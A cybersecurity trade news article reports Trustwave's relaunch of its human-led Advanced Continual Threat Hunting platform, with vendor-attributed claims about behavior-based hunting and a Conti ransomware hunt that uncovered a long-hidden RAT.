Cybersecurity vendor Trustwave has announced the relaunch of its Advanced Continual Threat Hunting platform with new, patent-pending human-led threat hunting methodology.
The firm claimed the enhancement will allow its SpiderLabs threat hunting teams to conduct increased human-led threat hunts and discover more behavior-based findings that could go undetected by traditional endpoint detection and response (EDR) tools.
New method hunts for behaviors associated with known threat actors
Trustwave stated that its security teams regularly perform advanced threat hunting to study the tactics, techniques, and procedures (TTPs) of sophisticated threat actors.
Trustwave’s new intellectual property (IP) goes beyond indicators of compromise (IoC) to uncover new or unknown threats by hunting for indicators of behavior (IoB) associated with specific attackers.
The patent-pending platform leverages MITRE ATT&CK framework-mapped queries derived from multiple EDR technologies through automation to specifically hunt for the IOBs of specific threat actors at scale, Trustwave said.
Learnings are then applied to bolster Trustwave’s detection and response capabilities across its managed detection and response (MDR) clients, the vendor stated.
The solution supports most popular EDR technologies available, such as Microsoft Defender for Endpoints, Palo Alto Networks Cortex XDR, and SentinelOne, Trustwave added.
Post-relaunch Advanced Continual Threat Hunting benefits listed by Trustwave include:
- Human-led advanced threat hunting conducted at scale with threat actor intelligence
- Discovery of malicious behavior-based activity, hidden, or persistent threats
- Continual updates to threat intelligence and detection content after discovering new IoCs
Shawn Kanady, global director, SpiderLabs Threat Hunt Team, tells CSO that a behavioral activity-focused treat hunting approach is critical for modern organisations because it allows them to detect unknown threats that traditional threat detection and prevention and EDR tools can’t.
“Automated hunts using tools based on IoC – for example, IP addresses or a hash of a file – alone are not sufficient to stop sophisticated threat actors who know how to evade detection. Additionally, as IOCs become known, attackers will change their infrastructure (e.g., domains, IPs, malware hashes).”
Hunting the Conti ransomware group
Kanady cites an example of a successful threat hunt using the new methodology to track the Conti ransomware gang.
“One incredible finding was a remote access Trojan (RAT) that had resided in a client network for 11 months undetected,” he says. “At this point, one of the true highlights of Advanced Continual Threat Hunting became apparent. While searching for Conti, the team found evidence of other threats and security lapses.”
It is normal for one gang to borrow tricks from another, and these were now being discovered along with general security hygiene issues like unsecured legacy systems, open ports, and people making foolish mistakes like storing passwords on their computers, Kanady adds.
“These issues are now all being found before they cause a breach or security incident. A typical security check would not uncover these problems.” As a result of the new methodology, the SpiderLabs Threat Hunting team has witnessed a three-times increase in behavior-based threat findings, Kanady claims.